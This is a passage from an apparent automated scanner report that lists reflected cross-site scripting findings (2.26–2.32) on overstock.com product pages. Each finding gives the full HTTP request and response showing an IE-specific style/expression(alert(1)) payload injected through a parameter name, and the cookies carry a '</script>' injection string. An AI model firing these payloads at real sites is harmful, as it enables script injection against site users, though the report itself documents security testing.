Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:02:19 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:02:19 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404939574:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4141562|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:19 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:19 GMT; Path=/
Keep-Alive: timeout=5, max=71
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 116936

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Ca
...[SNIP]...
<input type="hidden" name="941de"style="x:expression(alert(1))"3a880e61ac" value="1"/>
...[SNIP]...

2.26. http://www.overstock.com/Clothing-Shoes/Collezione-Mens-Lambskin-Leather-Jacket/3920123/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Collezione-Mens-Lambskin-Leather-Jacket/3920123/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b03f"style%3d"x%3aexpression(alert(1))"e0cdb060d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5b03f"style="x:expression(alert(1))"e0cdb060d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Collezione-Mens-Lambskin-Leather-Jacket/3920123/product.html?5b03f"style%3d"x%3aexpression(alert(1))"e0cdb060d8=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:00:14 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:00:14 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=3920123|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:00:14 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404814530:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:00:14 GMT; Path=/
Keep-Alive: timeout=5, max=86
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113961

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j17.overstock.com ssl:false -->


<head>

<title>Co
...[SNIP]...
<input type="hidden" name="5b03f"style="x:expression(alert(1))"e0cdb060d8" value="1"/>
...[SNIP]...

2.27. http://www.overstock.com/Clothing-Shoes/DKNY-Womens-Long-Quilted-Zip-front-Down-Coat/5129186/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/DKNY-Womens-Long-Quilted-Zip-front-Down-Coat/5129186/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3b05"style%3d"x%3aexpression(alert(1))"7c4fc8bbbe7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b3b05"style="x:expression(alert(1))"7c4fc8bbbe7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/DKNY-Womens-Long-Quilted-Zip-front-Down-Coat/5129186/product.html?b3b05"style%3d"x%3aexpression(alert(1))"7c4fc8bbbe7=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:01 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:01 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:01 GMT; Path=/
Set-Cookie: mxcproclicks=5129186|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:01 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408101862:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=46
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 117426

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>DK
...[SNIP]...
<input type="hidden" name="b3b05"style="x:expression(alert(1))"7c4fc8bbbe7" value="1"/>
...[SNIP]...

2.28. http://www.overstock.com/Clothing-Shoes/Daxx-Mens-Top-Grain-Deerskin-Leather-Gloves-with-Thinsulate-Lining/2092746/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Daxx-Mens-Top-Grain-Deerskin-Leather-Gloves-with-Thinsulate-Lining/2092746/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d252"style%3d"x%3aexpression(alert(1))"7b064bdd95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9d252"style="x:expression(alert(1))"7b064bdd95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Daxx-Mens-Top-Grain-Deerskin-Leather-Gloves-with-Thinsulate-Lining/2092746/product.html?9d252"style%3d"x%3aexpression(alert(1))"7b064bdd95=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:57:04 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:57:04 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289408224468:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:04 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=2092746|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:04 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=11
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 112215

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>Da
...[SNIP]...
<input type="hidden" name="9d252"style="x:expression(alert(1))"7b064bdd95" value="1"/>
...[SNIP]...

2.29. http://www.overstock.com/Clothing-Shoes/Elio-Womens-3-4-sleeve-Pullover-Sweater/5113820/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Elio-Womens-3-4-sleeve-Pullover-Sweater/5113820/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37afd"style%3d"x%3aexpression(alert(1))"a385aa3962a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 37afd"style="x:expression(alert(1))"a385aa3962a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Elio-Womens-3-4-sleeve-Pullover-Sweater/5113820/product.html?37afd"style%3d"x%3aexpression(alert(1))"a385aa3962a=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:54:45 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:54:45 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408085836:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5113820|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:54:45 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:54:45 GMT; Path=/
Keep-Alive: timeout=5, max=64
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113373

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>El
...[SNIP]...
<input type="hidden" name="37afd"style="x:expression(alert(1))"a385aa3962a" value="1"/>
...[SNIP]...

2.30. http://www.overstock.com/Clothing-Shoes/Etienne-Aigner-Leather-Tote-Bag/5160306/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Etienne-Aigner-Leather-Tote-Bag/5160306/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa850"style%3d"x%3aexpression(alert(1))"d836fa131f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fa850"style="x:expression(alert(1))"d836fa131f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Etienne-Aigner-Leather-Tote-Bag/5160306/product.html?fa850"style%3d"x%3aexpression(alert(1))"d836fa131f0=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:32 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:32 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:32 GMT; Path=/
Set-Cookie: mxcproclicks=5160306|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:32 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408192284:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 107922

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Et
...[SNIP]...
<input type="hidden" name="fa850"style="x:expression(alert(1))"d836fa131f0" value="1"/>
...[SNIP]...

2.31. http://www.overstock.com/Clothing-Shoes/Fendi-FS-478-S-Womens-Designer-Sunglasses/4456999/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Fendi-FS-478-S-Womens-Designer-Sunglasses/4456999/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f42b"style%3d"x%3aexpression(alert(1))"a9af4174a88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f42b"style="x:expression(alert(1))"a9af4174a88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Fendi-FS-478-S-Womens-Designer-Sunglasses/4456999/product.html?6f42b"style%3d"x%3aexpression(alert(1))"a9af4174a88=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:00:18 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:00:18 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404818258:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4456999|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:00:18 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:00:18 GMT; Path=/
Keep-Alive: timeout=5, max=78
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110778

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>Fe
...[SNIP]...
<input type="hidden" name="6f42b"style="x:expression(alert(1))"a9af4174a88" value="1"/>
...[SNIP]...

2.32. http://www.overstock.com/Clothing-Shoes/Fergie-Womens-Missy-Peep-toe-Heels/5235311/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Fergie-Womens-Missy-Peep-toe-Heels/5235311/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd6ae"style%3d"x%3aexpression(alert(1))"dba8e86bc84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bd6ae"style="x:expression(alert(1))"dba8e86bc84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Fergie-Womens-Missy-Peep-toe-Heels/5235311/product.html?bd6ae"style%3d"x%3aexpression(alert(1))"dba8e86bc84=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:53 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:53 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408153691:ccid^144812; Domain=.overstock.com; Path=/
